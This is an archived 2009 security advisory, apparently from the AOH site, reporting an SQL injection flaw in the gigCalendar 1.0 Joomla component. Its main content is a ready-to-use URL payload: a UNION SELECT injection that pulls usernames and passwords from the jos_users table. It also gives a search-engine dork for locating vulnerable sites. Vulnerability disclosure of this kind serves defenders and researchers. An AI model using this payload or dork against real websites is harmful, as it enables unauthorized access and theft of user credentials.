AOH :: HP Unsorted G :: VA2673.HTM

gigCalendar Joomla Component 1.0 SQL Injection



gigCalendar Joomla Component 1.0 SQL Injection
gigCalendar Joomla Component 1.0 SQL Injection



*******   Salvatore "drosophila" Fresta   *******


Application:	gigCalendar Joomla Component 1.0
http://joomlacode.org/gf/project/gigcalendar/ 
Version:		gigCalendar 1.0
Bug:         	* SQL Injection
Exploitation:	Remote
Dork:		inurl:"index.php?option=com_gigcal"
Date:         	21 Feb 2009
Discovered by:Salvatore "drosophila" Fresta
Author:       	Salvatore "drosophila" Fresta
e-mail: drosophilaxxx@gmail.com 
              	

*************************************************

- BUGS

SQL Injection:

	Requisites: magic_quotes_gpc = off

	File affected: banddetails.php

	This bug allows a guest to view username and
	password of a registered user.

http://www.site.com/path/index.php?option=com_gigcal&task=details&gigcal_bands_id=-1' 
UNION ALL SELECT 1,2,3,4,5,concat('username: ',
username),concat('password: ', password),NULL,NULL,NULL,NULL,NULL,NULL
from jos_users%23

*************************************************

-- 
Salvatore "drosophila" Fresta
CWNP444351

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.